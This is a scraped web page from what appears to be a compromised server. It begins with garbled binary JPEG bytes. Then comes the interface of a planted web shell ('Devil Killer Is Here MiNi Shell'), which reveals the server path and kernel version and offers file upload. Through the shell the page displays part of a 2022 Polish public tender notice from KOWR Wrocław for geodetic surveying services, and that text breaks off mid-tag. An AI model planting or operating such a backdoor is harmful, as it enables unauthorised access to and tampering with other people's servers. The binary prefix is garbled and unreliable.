JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220914/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220914/0034825301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług w zakresie wykonywania prac geodezyjnych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Krajowy Ośrodek Wsparcia Rolnictwa</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Oddział Terenowy we Wrocławiu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 367849538</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Mińska 60</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wrocław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">54-610</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL514 - Miasto Wrocław</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne.wroclaw@kowr.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.kowr.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - agencja wykonawcza</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Gospodarowanie nieruchomościami Skarbu Państwa </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług w zakresie wykonywania prac geodezyjnych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-824d7be6-33fa-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00348253</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-09-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00045456/20/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.23 usługi geodezyjne i pomiarowe</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://kowr.eb2b.com.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja odbywa się w formie elektronicznej, za pośrednictwem Platformy<br/>Zakupowej – pod adresem: https://kowr.eb2b.com.pl<br/>Zapytania kierowane na adresy mailowe nie będą rozpatrywane. Korzystanie z Platformy wymaga zarejestrowania konta na Platformie. Instrukcja korzystania z Platformy Zakupowej dostępna jest w zakładce „Pomoc/Instrukcje”. W zakładce „Załączniki” przedmiotowego postępowania Zamawiający<br/>zamieszcza dokumentację postępowania. Zakładka „Załączniki” służy również Wykonawcom do złożenia oferty oraz dokumentów lub oświadczeń składanych razem z ofertą. Korespondencja elektroniczna inna niż oferta Wykonawcy i załączniki do oferty, odbywa się elektronicznie za pośrednictwem Platformy w zakładce „Pytania/Informacje”. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej wskazanych w SWZ. Szczegółowe informacje zawarto w Rozdziale VIII SWZ</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Przy rejestracji Wykonawca przechodzi do Formularza rejestracyjnego poprzez zakładkę „LOGOWANIE” oraz opcję „ZAREJESTRUJ SIĘ”. Po wypełnieniu formularza rejestracyjnego Wykonawca otrzymuje emaila<br/>informującego,że może dokonać pierwszego logowania do Platformy.<br/>2. Minimalne wymagania techniczne i organizacyjne korzystania z Platformy określa Regulamin Platformy Zakupowej (dostępny pod adresem https://platforma.eb2b.com.pl/user/terms).<br/>3. Instrukcja korzystania z Platformy Zakupowej dostępna jest w zakładce „Pomoc/Instrukcje”.<br/>4. Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z platformy, określone w instrukcji korzystania z platformy oraz w regulaminie platformy. Wykonawca korzystając z platformy zobowiązuje się do przestrzegania postanowień zawartych w ww. instrukcji oraz w regulaminie platformy.<br/>5. System umożliwia dodanie plików o wielkości do 50 MB. Zamawiający<br/>dopuszcza wszczególności pliki w formatach: .doc, .docx, .xls, .xlsx, .pdf, .jpg, .zip, .rar.<br/>6. Korespondencja elektroniczna inna niż oferta Wykonawcy i załączniki do oferty, odbywa się elektronicznie za pośrednictwem Platformy w zakładce „Pytania/Informacje”.<br/>7. Za datę wpływu oferty, oświadczenia, o którym mowa w art. 125 ust 1 ustawy PZP, podmiotowych środków dowodowych, w tym oświadczenia,o którym mowa w art. 117 ust. 4 ustawy PZP, zobowiązania podmiotu udostępniającego zasoby,przedmiotowych środków dowodowych, pełnomocnictw, oraz innych informacji, dokumentów i oświadczeń przyjmuje się datę ich wczytywania do systemu (przesłania na Platformę).<br/>8. Plik oferty załączony przez Wykonawcę na Platformie i zapisany, widoczny jest w systemie jako zaszyfrowany.Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu składania ofert.<br/>10.Zamawiający określa następujące niezbędne wymagania sprzętowo -aplikacyjne umożliwiające pracę na Platformie: <br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 2 mb/s; <br/>2) komputer klasy PC lub PC lub MAC, o następującej konfiguracji: pamięć min. 4GB Ram, proce-sor Intel IV 4GHZ, jeden z systemów operacyjnych - MSWindows 7, Mac Os x 10.4, Linux lub ich nowsze wersje; <br/>3) zainstalowana dowolna najnowsza wersja przeglądarki internetowej; w przypadku Internet Explorer minimalnie wersja 11.0; <br/>4)włączona obsługa JavaScript; 5) zainstalowany program Acrobat Reader. 11. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgodny z wymaganiami określonymi w Rozporządzeniach, o których mowa w rozdziale II ust.1 SWZ. <br/>12.Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej wskazanej w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z rozdziałem XXII SWZ<br/>1.	Administrator danych osobowych<br/>Administratorem, czyli podmiotem decydującym o celach i środkach przetwarzania Pani/Pana danych osobowych, jest Krajowy Ośrodek Wsparcia Rolnictwa (zwany dalej KOWR) z siedzibą w Warszawie (01-207) przy ul. Karolkowej 30. Z administratorem może się Pani/Pan skontaktować poprzez adres e-mail: kontakt@kowr.gov.pl lub pisemnie na adres korespondencyjny: Krajowy Ośrodek Wsparcia Rolnictwa, ul. Karolkowa 30, 01-207 Warszawa. <br/>2.	Inspektor Ochrony Danych Osobowych<br/>W KOWR wyznaczono Inspektora Ochrony Danych Osobowych, z którym może się Pani/Pan skontaktować w sprawach ochrony i przetwarzania swoich danych osobowych pod adresem e-mail: iodo@kowr.gov.pl lub pisemnie na adres naszej siedziby, wskazany w ust. 1.<br/>3.	Cele i podstawy prawne przetwarzania danych osobowych<br/>Pani/Pana dane osobowe przetwarzane będą w celach związanym z postępowaniem o udzielenie zamówienia publicznego prowadzonym na podstawie ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych – Dz.U. z 2019 r. poz. 2019 z póżn. zm. (dalej PZP), w celach związanych z realizacją obowiązków administratora jako Zamawiającego, które wynikają z obowiązujących przepisów prawa. Pani/Pana dane osobowe przetwarzane będą także w celu realizacji obowiązku prowadzenia ewidencji korespondencji i archiwizacji dokumentacji zgodnie z ustawą z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach (Dz. U. z 2020 r. poz. 164 z późn. zm.).<br/>4.	Odbiorcy danych osobowych<br/>Pani/Pana dane pozyskane w związku z postępowaniem o udzielenie zamówienia publicznego przekazywane będą wszystkim zainteresowanym podmiotom i osobom, gdyż co do zasady postępowanie o udzielenie zamówienia publicznego jest jawne.<br/>Ograniczenie dostępu do Pani/Pana danych, o których mowa wyżej może wystąpić jedynie w szczególnych przypadkach, jeśli jest to uzasadnione ochroną prywatności, zgodnie z art. 18 ust 5 pkt 1 i 2 PZP.<br/>Pani/Pana dane osobowe mogą być udostępniane innym osobom lub podmiotom jeżeli obowiązek taki będzie wynikać z przepisów prawa. Do Pani/Pana danych mogą też mieć dostęp podmioty przetwarzające dane w naszym imieniu, np. podmioty świadczące pomoc prawną, usługi informatyczne, usługi niszczenia dokumentów, jak również inni administratorzy danych osobowych przetwarzający dane we własnym imieniu, np. podmioty prowadzące działalność pocztową lub kurierską.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z rozdziałem XXII SWZ<br/>5.	Okres przetwarzania danych osobowych <br/>Pani/Pana dane osobowe będą przetwarzane przez okres przewidziany przepisami prawa w tym zakresie, w tym przez okres przechowywania dokumentacji określony w przepisach powszechnych i uregulowaniach wewnętrznych KOWR w zakresie archiwizacji dokumentów, okres przedawnienia roszczeń przysługujących KOWR i w stosunku do niego.<br/>Dokumentacja dotycząca postępowania o udzielenie zamówienia publicznego będzie przechowywana, zgodnie z art. 78 ust. 1 PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, licząc od dnia 1 stycznia roku następnego po dniu zakończenia postępowania, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. <br/>6.	Informacja o wymogu/dobrowolności podania danych osobowych<br/>Podanie Pani/Pana danych osobowych w związku z udziałem w postępowaniu o udzielenie zamówienia ma charakter dobrowolny, ale jest niezbędne do wzięcia w nim udziału. <br/>7.	Prawa osób, których dane dotyczą<br/>Zgodnie z RODO przysługuje Pani/Panu:<br/>1)	prawo dostępu do swoich danych oraz otrzymania ich kopii; <br/>2)	prawo do sprostowania (poprawiania) swoich danych; <br/>3)	prawo do usunięcia danych osobowych, w sytuacji, gdy przetwarzanie danych nie następuje w celu wywiązania się z obowiązku wynikającego z przepisu prawa lub w ramach sprawowania władzy publicznej; <br/>4)	prawo do ograniczenia przetwarzania danych, przy czym przepisy odrębne mogą wyłączyć możliwość skorzystania z tego prawa.<br/>Jeżeli chce Pani/Pan skorzystać z któregokolwiek z tych uprawnień, prosimy o kontakt z Inspektorem Ochrony Danych Osobowych, wskazany w pkt 2 lub pisemnie na adres korespondencyjny, wskazany w pkt 1.<br/>Zgodnie z RODO, każdej osobie, której dane są przetwarzane przysługuje prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych. <br/>8.	Zautomatyzowane podejmowanie decyzji<br/>W oparciu o Pani/Pana dane osobowe administrator nie będzie podejmował wobec Pani/Pana zautomatyzowanych decyzji, w tym decyzji będących wynikiem profilowania. <br/>9.	Przekazywanie danych poza Europejski Obszar Gospodarczy<br/>W związku z jawnością postępowania o udzielenie zamówienia publicznego Pani/Pana dane mogą być przekazywane do państw trzecich (tj. państwa, które nie należy do Europejskiego Obszaru Gospodarczego obejmującego Unię Europejską, Norwegię, Liechtenstein i Islandię), z zastrzeżeniem, o którym mowa w punkcie 4.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WRO.WOP.260.39.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 266595,13 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia obejmuje: <br/>2.1. świadczenie usług w zakresie wykonywania prac geodezyjnych, obejmujących w szczególności, jednak nie wyłącznie, wykonywanie podziałów geodezyjnych nieruchomości, ustalanie linii brzegu wody płynącej i stojącej oraz okazywanie granic, które to prace nie zostały wykonane w ramach umów, zawartych przez Zamawiającego z wykonawcami wyłonionymi w organizowanych przez Zamawiającego postępowaniach o udzielenie zamówienia publicznego, bądź to z uwagi na stopień ich skomplikowania bądź to wskutek przeszkód, których pojawienia się nie można było przewidzieć w dniu powierzenia usług do wykonania, natomiast Zamawiający rozwiązał umowę z dotychczasowym wykonawcą lub odstąpił od takiej umowy,<br/>2.2. wykonywanie usług geodezyjnych, wobec których nie jest możliwe jednoznaczne ustalenie terminu realizacji usługi i/lub zakresu niezbędnych do wykonania w jej ramach prac, z uwagi na nieuregulowany stan formalnoprawny nieruchomości lub/i na konieczność uprzedniego rozwiązania kwestii, dotyczących sposobu wykonywania tych prac,<br/>2.3. wykonywanie usług geodezyjnych polegających w szczególności na:<br/>2.3.1. czynnościach okazywania granic, wznawiania punktów granicznych, ustalania granic nieruchomości oraz tym podobnych pracach, prowadzonych w celu ustalenia przebiegu granicy i określenia powierzchni ewidencyjnej nieruchomości,<br/>2.3.2. dokonywaniu geodezyjnych zmian sposobu użytkowania działki,<br/>2.3.3. aktualizacji operatów ewidencji gruntów,<br/>2.3.4. aktualizacji mapy zasadniczej,<br/>2.3.5. pomiarach w terenie, w tym między innymi pomiarach zasiewów, zabudowy, granic, elementów zagospodarowania terenu, lokalizacji drzew, występowanie barszczu Sosnowskiego, miejsc posadowienia reklam, powierzchni znajdującej się w bezumownym użytkowaniu, itp., wykonywaniu odpowiednich obliczeń i analiz oraz na przedstawianiu Zamawiającemu opinii z wykonywanych pomiarów i obliczeń,<br/>2.3.6. analizie i wykonywaniu obliczeń powierzchni terenów wchodzących w skład Zasobu Własności Rolnej Skarbu Państwa o różnym przeznaczeniu w miejscowym planie zagospodarowania przestrzennego, w studium uwarunkowań i kierunków zagospodarowania przestrzennego, w decyzji o warunkach zabudowy, objętych ochroną konserwatorską, projektowanych do wydzielenia działek i innych tego typu obliczeń, w tym graficznych,<br/>2.3.7. inwentaryzacji nakładów poniesionych przez dzierżawcę na nieruchomość i sporządzaniu map obiektów niezbędnych do prawidłowej wyceny nieruchomości,<br/>2.3.8. pomiarach kubaturowych mas ziemnych, odpadów, gruzu i innych mas tego typu oraz wykonaniu obliczeń i przedstawieniu Zamawiającemu opinii z wykonanych pomiarów i obliczeń,<br/>2.3.9. graficzne pomiary odległości i powierzchni,<br/>2.3.10. wykonywanie tzw. podziałów umownych nieruchomości Zasobu przeznaczonych do dzierżawy (mapy sposobu korzystania z nieruchomości) oraz okazywania tych podziałów w terenie,<br/>2.3.11. opracowywanie koncepcji podziałów nieruchomości, wchodzących w skład Zasobu Własności Rolnej Skarbu Państwa (w tym wstępnych projektów podziałów),<br/>2.3.12.	opracowywanie koncepcji przebiegu służebności przez grunty, wchodzące w skład Zasobu Własności Rolnej Skarbu Państwa,<br/>2.3.13. uczestnictwo w okazywaniu granic nieruchomości, wchodzących w skład Zasobu Własności Rolnej Skarbu Państwa w imieniu Zamawiającego, wykonywanych przez podmioty zewnętrzne<br/>2.3.14. opiniowanie przedstawionych przez geodetów wstępnych projektów podziałów gruntów wchodzących w skład Zasobu Własności Rolnej Skarbu Państwa,<br/>2.3.15. współdziałanie w imieniu Zamawiającego z właściwymi organami administracji publicznej w zakresie związanym z tematyką geodezyjną,<br/>2.3.16. przygotowywanie korespondencji z osobami fizycznymi, prawnymi i właściwymi organami administracji publicznej i instytucjami w zakresie związanym z tematyką geodezyjną,<br/>2.3.17. wywiad terenowy w celu stwierdzenia zasadności prowadzenia prac geodezyjnych, ustalenia rodzaju niezbędnej do wykonania pracy geodezyjnej,<br/>2.3.18. weryfikacja stabilizacji granic po wykonanych podziałach nieruchomości,<br/>2.3.19. weryfikacja wniosków dzierżawców i innych podmiotów o zmianę klasyfikacji gruntów,<br/>2.3.20	weryfikacja opinii biegłych sądowych, wydawanych w sprawach toczących się z udziałem Zamawiającego,<br/>2.3.21. weryfikacja granic nieruchomości, użytków i powierzchni działek na terenach objętych modernizacją ewidencji gruntów i budynków, w trakcie jej trwania oraz po jej zakończeniu,<br/>2.3.22. współpraca z pracownikami Zamawiającego w zakresie związanym z tematyką geodezyjną,<br/>2.3.23. współpraca z wykonawcami prac geodezyjnych na gruntach wchodzących w skład Zasobu Własności Rolnej Skarbu Państwa, prowadzonych na zamówienie podmiotów trzecich,<br/>2.3.24. współudział po stronie Zamawiającego w odbiorach prac geodezyjnych, wykonywanych przez wykonawców wyłonionych w ramach postępowań o udzielenie zamówień publicznych.<br/>2.4. Wykonywane usługi dotyczyć będą nieruchomości wchodzących w skład Zasobu Własności Rolnej Skarbu Państwa, położonych na obszarze właściwości Zamawiającego – Krajowego Ośrodka Wsparcia Rolnictwa Oddziału Terenowego we Wrocławiu, w tym nieruchomości rozdysponowanych, jak i nieruchomości z obszaru województwa dolnośląskiego, które mają zostać przyjęte do tego Zasobu na podstawie powszechnie obowiązujących przepisów prawa lub do których KOWR posiada roszczenia.<br/>2.5. Świadczenie usług wykonywanych w ramach niniejszego zamówienia będzie odbywało się: w terenie lub siedzibie KOWR OT we Wrocławiu przy ul. Mińskiej 60<br/>2.6	wykonawca zobowiązany będzie świadczyć usługi (w tym prace terenowe) w wymiarze <br/>160 godzin miesięcznie. <br/>2.7	przed wystawieniem faktury za wykonane usługi, wykonawca zobowiązany będzie do sporządzania wykazów z wykonanych usług w szczególności rozliczeń finansowych, jakościowych i ilościowych dla spraw prowadzonych wraz z rozliczeniem godzinowym.<br/>2.8	zamawiający zapewni Wykonawcy nieodpłatną obsługę organizacyjno-techniczną siedzibie KOWR OT we Wrocławiu, w tym: <br/>- wyposażone stanowisko pracy biurowej, z dostępem do podstawowych urządzeń technicznych, w tym komputera, kopiarki, telefonu, umożliwiające wykonywanie czynności w zakresie przewidzianym umową,<br/>- wysyłanie i odbiór korespondencji związanej z świadczoną usługą, <br/>- kompletowanie i udostępnianie niezbędnych dla danej sprawy dokumentów źródłowych.<br/> - odbiornika GPS, tachimetru,<br/>2.9 pozostałe warunki realizacji zamówienia opisane zostały w istotnych postanowieniach umownych, stanowiących załącznik do SWZ.<br/>2.10	Wykonawca będzie używał do świadczenia usługi własnego środka transportu. <br/>W okresie ostatnich 24 miesięcy wykonawcy świadczący podobne usługi wykonali ok. 40 tys. km co średnio miesięcznie wynosi 1667 km<br/>W okresie ostatnich 24 miesięcy zostało wykonanych m.in.:<br/>•	Podziałów geodezyjnych w ilości 5 działek <br/>•	wznowień punktów granicznych (zgłoszonych w PODGIK) w ilości 4 działek <br/>•	Wskazanie granic działek na gruncie na podst. współrzędnych pkt. granicznych- 120 działek <br/>•	Zmiany sposobu użytkowania w ilości 6 działek <br/>•	Pomiar sposobu zagospodarowania terenu w ilości 21 działek<br/>•	Opracowanie map do ustanowienia służebności gruntowych w ilości 10 sztuk <br/>•	Wykonywaniu obliczeń powierzchni terenów wchodzących w skład Zasobu o różnym przeznaczeniu w miejscowym planie zagospodarowania przestrzennego, w studium uwarunkowań i kierunków zagospodarowania przestrzennego, w decyzji o warunkach zabudowy, objętych ochroną konserwatorską, projektowanych działek i innych tego typu obliczeń graficznych w ilości 8 działek<br/>•	Opiniowanie wstępnych projektów podziałów i innych dokumentów przedstawionych przez geodetów w ilości 25 szt.<br/>•	Przygotowanie korespondencji z osobami fizycznymi, prawnymi i instytucjami w zakresie tematyki geodezyjnej w ilości około 120 szt.<br/>•	Weryfikacja opinii biegłych sądowych 8 szt.<br/>•	Opracowanie wniosków o zmianę klasyfikacji gruntów oraz analiza protokołów klasyfikacji gruntów – 30 działki<br/>•	Opracowanie mapy sposobu korzystania z nieruchomości – 95 szt. <br/><br/>3.	Usługa świadczona będzie przez co najmniej jedną osobę posiadającą uprawnienia zawodowe określone w ustawie 17 maja 1989r. prawo geodezyjne i kartograficzne ( Dz.U. z 2020 r poz. 276)w zakresie: <br/>	- geodezyjnych pomiarów sytuacyjno-wysokościowych, realizacyjnych i inwestycyjnych<br/>	- rozgraniczania i podziałów nieruchomości (gruntów) oraz sporządzania dokumentacji do celów prawnych <br/>	- legitymującą się świadectwem ukończenia kursu w zakresie gleboznawczej klasyfikacji gruntów.<br/><br/>4.	W oparciu o art. 121 Ustawy PZP, Zamawiający zastrzega obowiązek osobistego wykonania przez Wykonawcę kluczowych części zamówienia. Kluczową częścią zamówienia dla Zamawiającego są usługi wymienione w ust 2.1, 2.2, 2.3.1, 2.3.2, 2.3.3, 2.3.4, 2.3.13, Ponadto wykonawca zobowiązany do kontrolowania, podpisywania lub parafowania wszystkich dokumentów przeznaczonych dla zamawiającego. </p> <h3 class="mb-0">4.2.6.) 